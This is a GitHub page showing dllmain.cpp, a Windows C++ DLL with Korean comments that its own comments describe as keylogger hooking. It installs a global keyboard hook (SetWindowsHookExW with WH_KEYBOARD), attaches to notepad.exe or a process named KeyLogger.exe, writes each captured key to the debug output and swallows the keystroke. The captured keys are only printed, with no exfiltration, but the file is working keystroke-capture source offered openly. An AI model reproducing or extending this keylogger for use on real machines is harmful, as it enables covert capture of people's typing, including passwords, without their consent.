-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdllmain.cpp
122 lines (97 loc) · 2.63 KB
/
dllmain.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
// dllmain.cpp : DLL 응용 프로그램의 진입점을 정의합니다.
#include "windows.h"
#include "cstdio"
#include "tchar.h"
#include "tlhelp32.h"
#include "psapi.h"
HINSTANCE g_hInstance = NULL;
HHOOK g_hHook = NULL;
HWND g_hWnd = NULL;
TCHAR buf[BUFSIZ] = { 0, }; //
TCHAR *pt = NULL; //
DWORD sPid; //process id
HANDLE sHnd; //Handle
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call,LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
//GetCurrentProcess();
sPid = GetCurrentProcessId();
// process name
// >> installer or notepad.exe 아니면, return FALSE
sHnd = OpenProcess(PROCESS_ALL_ACCESS,FALSE,sPid);
if (sHnd == NULL) {
OutputDebugStringW(L"sHnd Fail\n");
}
if ( GetModuleFileNameExW(sHnd, NULL, buf, sizeof(buf))==0 ) {
OutputDebugStringW(L"GetModuleFileNameEx Fail\n");
}
pt = _tcsrchr(buf, '\\');
//notepad hooking
if (!_tcscmp(pt + 1, L"notepad.exe")) {
g_hInstance = hinstDLL;
OutputDebugStringW(L"notepad attach\n");
return TRUE;
}
//keylogger hooking(essential)
else if (!_tcscmp(pt + 1, L"KeyLogger.exe")) {
g_hInstance = hinstDLL;
OutputDebugStringW(L"KeyLogger attach\n");
return TRUE;
}
else {
g_hInstance = hinstDLL;
return FALSE;
}
//OutputDebugStringW(L"attach");
g_hInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
LRESULT CALLBACK KeyBoardProc(int nCode, WPARAM wParam, LPARAM lParam) {
TCHAR buffer[100] = { 0, };
if (nCode >= 0) {
if (!(lParam & 0x80000000)) {
HANDLE sdwHandle;
sdwHandle = GetCurrentProcess();
DWORD dwExitCode = NULL;
GetExitCodeProcess(sdwHandle, &dwExitCode);
if (dwExitCode == STILL_ACTIVE) {
wsprintfW(buffer, L"%c", wParam);
::OutputDebugStringW(buffer);
return 1;
}
else {
::OutputDebugStringW(_T("Current is Process is Dead\n"));
return 1;
}
}
}
return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}
#ifdef __cplusplus
extern "C" {
#endif
__declspec(dllexport) void hookstart() {
//HANDLE sdwHandle;
//sdwHandle = GetCurrentProcess();
//DWORD dwExitCode = NULL;
//GetExitCodeProcess(sdwHandle, &dwExitCode);
//if (dwExitCode == STILL_ACTIVE) {
// g_hHook = SetWindowsHookExW(WH_KEYBOARD, KeyBoardProc, g_hInstance, 0);
//}
g_hHook = SetWindowsHookExW(WH_KEYBOARD, KeyBoardProc, g_hInstance, 0);
}
__declspec(dllexport) void hookstop() {
if (g_hHook) {
UnhookWindowsHookEx(g_hHook);
g_hHook = NULL;
}
}
#ifdef __cplusplus
}
#endif